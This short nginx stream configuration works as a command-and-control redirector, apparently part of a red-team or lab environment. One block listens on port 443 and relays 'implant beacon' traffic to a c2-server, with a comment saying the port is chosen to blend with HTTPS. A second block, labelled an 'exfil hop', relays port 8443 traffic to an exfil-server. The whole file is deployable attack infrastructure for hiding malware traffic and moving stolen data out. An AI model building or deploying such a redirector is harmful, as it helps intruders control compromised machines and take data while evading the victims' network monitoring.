worker_processes 1;

events {
    worker_connections 1024;
}

stream {
    # Implant beacon port - listens on 443 to blend with HTTPS traffic
    server {
        listen 443;
        proxy_pass c2-server:9999;
        proxy_connect_timeout 10s;
        proxy_timeout         300s;
    }

    # Exfil hop - listens on 8443, proxied to exfil-server internally
    server {
        listen 8443;
        proxy_pass exfil-server:9090;
        proxy_connect_timeout 10s;
        proxy_timeout         300s;
    }
}
